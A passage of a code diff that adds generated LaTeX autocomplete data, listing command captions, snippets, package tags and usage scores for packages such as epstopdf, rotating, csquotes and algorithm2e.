'pdfpages-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'pdfpages-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'pdfpages-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'pdfpages-cmd', + score: 0.0018957469739775527, + }, + ], + epstopdf: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\AppendGraphicsExtensions{}', + snippet: '\\AppendGraphicsExtensions{$1}', + meta: 'epstopdf-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'epstopdf-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'epstopdf-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'epstopdf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'epstopdf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\epstopdfsetup{}', + snippet: '\\epstopdfsetup{$1}', + meta: 'epstopdf-cmd', + score: 0.0009941134326203623, + }, + { + caption: '\\epstopdfDeclareGraphicsRule{}{}{}{}', + snippet: '\\epstopdfDeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'epstopdf-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\OutputFile', + snippet: '\\OutputFile', + meta: 'epstopdf-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'epstopdf-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'epstopdf-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + ], + lmodern: [ + { + caption: '\\rmdefault', + snippet: '\\rmdefault', + meta: 'lmodern-cmd', + score: 0.0012870877747432935, + }, + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'lmodern-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'lmodern-cmd', + score: 0.008427383388519996, + }, + ], + pifont: [ + { + caption: '\\ding{}', + snippet: '\\ding{$1}', + meta: 'pifont-cmd', + score: 0.009992300665793867, + }, + ], + ragged2e: [ + { + caption: '\\justifying', + snippet: '\\justifying', + meta: 'ragged2e-cmd', + score: 0.010373702256548788, + }, + { + caption: '\\justifying{}', + snippet: '\\justifying{$1}', + meta: 'ragged2e-cmd', + score: 0.010373702256548788, + }, + { + caption: '\\RaggedRight', + snippet: '\\RaggedRight', + meta: 'ragged2e-cmd', + score: 0.001021021782267457, + }, + { + caption: '\\Centering', + snippet: '\\Centering', + meta: 'ragged2e-cmd', + score: 0.00037395241488843035, + }, + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'ragged2e-cmd', + score: 0.04598628699063736, + }, + ], + rotating: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rotating-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'rotating-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'rotating-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'rotating-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'rotating-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'rotating-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'rotating-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'rotating-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'rotating-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'rotating-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'rotating-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rotating-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'rotating-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'rotating-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'rotating-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'rotating-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'rotating-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'rotating-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'rotating-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'rotating-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + ], + xltxtra: [ + { + caption: '\\textsubscript{}', + snippet: '\\textsubscript{$1}', + meta: 'xltxtra-cmd', + score: 0.058405875394131175, + }, + { + caption: '\\textsuperscript{}', + snippet: '\\textsuperscript{$1}', + meta: 'xltxtra-cmd', + score: 0.05216393882408519, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'xltxtra-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xltxtra-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'xltxtra-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xltxtra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xltxtra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'xltxtra-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'xltxtra-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'xltxtra-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'xltxtra-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'xltxtra-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xltxtra-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'xltxtra-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xltxtra-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'xltxtra-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'xltxtra-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\XeTeX', + snippet: '\\XeTeX', + meta: 'xltxtra-cmd', + score: 0.0010635559050357936, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'xltxtra-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'xltxtra-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'xltxtra-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'xltxtra-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\XeLaTeX', + snippet: '\\XeLaTeX', + meta: 'xltxtra-cmd', + score: 0.002009786035379175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xltxtra-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xltxtra-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xltxtra-cmd', + score: 0.2864294797053033, + }, + ], + marvosym: [ + { + caption: '\\Mundus', + snippet: '\\Mundus', + meta: 'marvosym-cmd', + score: 0.0006349134235582933, + }, + { + caption: '\\Telefon', + snippet: '\\Telefon', + meta: 'marvosym-cmd', + score: 0.0003618274070138519, + }, + { + caption: '\\Letter', + snippet: '\\Letter', + meta: 'marvosym-cmd', + score: 0.0012281130571092198, + }, + { + caption: '\\Mobilefone', + snippet: '\\Mobilefone', + meta: 'marvosym-cmd', + score: 0.0005432037068220953, + }, + ], + dcolumn: [ + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'dcolumn-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'dcolumn-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'dcolumn-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'dcolumn-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'dcolumn-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'dcolumn-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'dcolumn-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'dcolumn-cmd', + score: 0.018615449342361392, + }, + ], + xspace: [ + { + caption: '\\xspace', + snippet: '\\xspace', + meta: 'xspace-cmd', + score: 0.07560370351316588, + }, + ], + xunicode: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xunicode-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xunicode-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xunicode-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xunicode-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'xunicode-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'xunicode-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'xunicode-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'xunicode-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'xunicode-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xunicode-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'xunicode-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xunicode-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'xunicode-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'xunicode-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'xunicode-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xunicode-cmd', + score: 0.008565354665444157, + }, + ], + csquotes: [ + { + caption: '\\mkcitation', + snippet: '\\mkcitation', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\DeclareQuoteAlias{}{}', + snippet: '\\DeclareQuoteAlias{$1}{$2}', + meta: 'csquotes-cmd', + score: 0.0004906235524176374, + }, + { + caption: '\\quote{}', + snippet: '\\quote{$1}', + meta: 'csquotes-cmd', + score: 0.030690393112264815, + }, + { + caption: '\\quote', + snippet: '\\quote', + meta: 'csquotes-cmd', + score: 0.030690393112264815, + }, + { + caption: '\\setquotestyle[]{}', + snippet: '\\setquotestyle[$1]{$2}', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\blockquote{}', + snippet: '\\blockquote{$1}', + meta: 'csquotes-cmd', + score: 0.00023365626458085812, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'csquotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'csquotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\mkbegdispquote', + snippet: '\\mkbegdispquote', + meta: 'csquotes-cmd', + score: 4.203362017075738e-5, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'csquotes-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\break', + snippet: '\\break', + meta: 'csquotes-cmd', + score: 0.016352452390960115, + }, + { + caption: '\\break{}', + snippet: '\\break{$1}', + meta: 'csquotes-cmd', + score: 0.016352452390960115, + }, + { + caption: '\\break{}{}', + snippet: '\\break{$1}{$2}', + meta: 'csquotes-cmd', + score: 0.016352452390960115, + }, + { + caption: '\\ifpunctmark{}', + snippet: '\\ifpunctmark{$1}', + meta: 'csquotes-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\endquote', + snippet: '\\endquote', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'csquotes-cmd', + score: 0.413853376001159, + }, + { + caption: '\\DeclareQuoteStyle[]{}', + snippet: '\\DeclareQuoteStyle[$1]{$2}', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\SetBlockEnvironment{}', + snippet: '\\SetBlockEnvironment{$1}', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'csquotes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\MakeOuterQuote{}', + snippet: '\\MakeOuterQuote{$1}', + meta: 'csquotes-cmd', + score: 0.0019170811203505262, + }, + { + caption: '\\enquote{}', + snippet: '\\enquote{$1}', + meta: 'csquotes-cmd', + score: 0.0077432730806830915, + }, + { + caption: '\\SetCiteCommand{}', + snippet: '\\SetCiteCommand{$1}', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'csquotes-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'csquotes-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'csquotes-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'csquotes-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'csquotes-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'csquotes-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'csquotes-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'csquotes-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'csquotes-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'csquotes-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'csquotes-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'csquotes-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'csquotes-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'csquotes-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'csquotes-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'csquotes-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'csquotes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'csquotes-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'csquotes-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'csquotes-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'csquotes-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'csquotes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'csquotes-cmd', + score: 0.00037306820619479756, + }, + ], + xparse: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xparse-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xparse-cmd', + score: 0.2864294797053033, + }, + ], + soul: [ + { + caption: '\\DeclareRobustCommand{}{}', + snippet: '\\DeclareRobustCommand{$1}{$2}', + meta: 'soul-cmd', + score: 0.0010373158471650705, + }, + { + caption: '\\DeclareRobustCommand{}[]{}', + snippet: '\\DeclareRobustCommand{$1}[$2]{$3}', + meta: 'soul-cmd', + score: 0.0010373158471650705, + }, + { + caption: '\\sethlcolor{}', + snippet: '\\sethlcolor{$1}', + meta: 'soul-cmd', + score: 0.01970230898277056, + }, + { + caption: '\\st', + snippet: '\\st', + meta: 'soul-cmd', + score: 0.004652662833362787, + }, + { + caption: '\\st{}', + snippet: '\\st{$1}', + meta: 'soul-cmd', + score: 0.004652662833362787, + }, + { + caption: '\\def', + snippet: '\\def', + meta: 'soul-cmd', + score: 0.21357759092476175, + }, + { + caption: '\\hl{}', + snippet: '\\hl{$1}', + meta: 'soul-cmd', + score: 0.03421486301062431, + }, + { + caption: '\\sodef', + snippet: '\\sodef', + meta: 'soul-cmd', + score: 0.0017045357696831268, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'soul-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\so', + snippet: '\\so', + meta: 'soul-cmd', + score: 0.004308800134587786, + }, + { + caption: '\\so{}', + snippet: '\\so{$1}', + meta: 'soul-cmd', + score: 0.004308800134587786, + }, + ], + comment: [ + { + caption: '\\specialcomment{}{}{}', + snippet: '\\specialcomment{$1}{$2}{$3}', + meta: 'comment-cmd', + score: 9.120209837787948e-5, + }, + { + caption: '\\includecomment{}', + snippet: '\\includecomment{$1}', + meta: 'comment-cmd', + score: 8.21804444236254e-5, + }, + ], + algorithm2e: [ + { + caption: '\\FuncSty{}', + snippet: '\\FuncSty{$1}', + meta: 'algorithm2e-cmd', + score: 7.576875738934807e-5, + }, + { + caption: '\\algorithmautorefname', + snippet: '\\algorithmautorefname', + meta: 'algorithm2e-cmd', + score: 2.0085955839419213e-5, + }, + { + caption: '\\SetAlgoNoLine', + snippet: '\\SetAlgoNoLine', + meta: 'algorithm2e-cmd', + score: 0.00015722499147840545, + }, + { + caption: '\\Indp', + snippet: '\\Indp', + meta: 'algorithm2e-cmd', + score: 6.068942580823901e-5, + }, + { + caption: '\\AlCapFnt', + snippet: '\\AlCapFnt', + meta: 'algorithm2e-cmd', + score: 3.0307502955739227e-5, + }, + { + caption: '\\LinesNumbered', + snippet: '\\LinesNumbered', + meta: 'algorithm2e-cmd', + score: 0.000162125616653719, + }, + { + caption: '\\SetAlFnt{}', + snippet: '\\SetAlFnt{$1}', + meta: 'algorithm2e-cmd', + score: 0.0024446198714390757, + }, + { + caption: '\\SetKw{}{}', + snippet: '\\SetKw{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 9.292434841280213e-5, + }, + { + caption: '\\RestyleAlgo{}', + snippet: '\\RestyleAlgo{$1}', + meta: 'algorithm2e-cmd', + score: 0.00019243311960945823, + }, + { + caption: '\\listofalgorithms', + snippet: '\\listofalgorithms', + meta: 'algorithm2e-cmd', + score: 0.0012576983422794912, + }, + { + caption: '\\IncMargin{}', + snippet: '\\IncMargin{$1}', + meta: 'algorithm2e-cmd', + score: 0.0024294661199612063, + }, + { + caption: '\\BlankLine', + snippet: '\\BlankLine', + meta: 'algorithm2e-cmd', + score: 0.005049617303688214, + }, + { + caption: '\\SetCommentSty{}', + snippet: '\\SetCommentSty{$1}', + meta: 'algorithm2e-cmd', + score: 0.0001778112853266571, + }, + { + caption: '\\SetAlgoNoEnd', + snippet: '\\SetAlgoNoEnd', + meta: 'algorithm2e-cmd', + score: 0.00015722499147840545, + }, + { + caption: '\\theAlgoLine{}', + snippet: '\\theAlgoLine{$1}', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\SetKwBlock{}{}{}', + snippet: '\\SetKwBlock{$1}{$2}{$3}', + meta: 'algorithm2e-cmd', + score: 0.000981463850523159, + }, + { + caption: '\\SetKwBlock{}{}', + snippet: '\\SetKwBlock{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 0.000981463850523159, + }, + { + caption: '\\AlCapNameFnt', + snippet: '\\AlCapNameFnt', + meta: 'algorithm2e-cmd', + score: 3.0307502955739227e-5, + }, + { + caption: '\\SetAlgoSkip{}', + snippet: '\\SetAlgoSkip{$1}', + meta: 'algorithm2e-cmd', + score: 0.00017454032258926576, + }, + { + caption: '\\SetKwFunction{}{}', + snippet: '\\SetKwFunction{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 0.0015332307832994817, + }, + { + caption: '\\nllabel{}', + snippet: '\\nllabel{$1}', + meta: 'algorithm2e-cmd', + score: 0.0001844460347791443, + }, + { + caption: '\\SetAlgoInsideSkip{}', + snippet: '\\SetAlgoInsideSkip{$1}', + meta: 'algorithm2e-cmd', + score: 4.5812360816321294e-5, + }, + { + caption: '\\DataSty{}', + snippet: '\\DataSty{$1}', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\SetKwInOut{}{}', + snippet: '\\SetKwInOut{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 0.0017021978326807814, + }, + { + caption: '\\SetAlCapFnt{}', + snippet: '\\SetAlCapFnt{$1}', + meta: 'algorithm2e-cmd', + score: 0.0024294661199612063, + }, + { + caption: '\\CommentSty{}', + snippet: '\\CommentSty{$1}', + meta: 'algorithm2e-cmd', + score: 0.0001111448631633176, + }, + { + caption: '\\SetAlCapHSkip{}', + snippet: '\\SetAlCapHSkip{$1}', + meta: 'algorithm2e-cmd', + score: 0.0024294661199612063, + }, + { + caption: '\\renewcommand{}{}', + snippet: '\\renewcommand{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 0.3267437011085663, + }, + { + caption: '\\renewcommand', + snippet: '\\renewcommand', + meta: 'algorithm2e-cmd', + score: 0.3267437011085663, + }, + { + caption: '\\algorithmcfname', + snippet: '\\algorithmcfname', + meta: 'algorithm2e-cmd', + score: 0.0024445413067013134, + }, + { + caption: 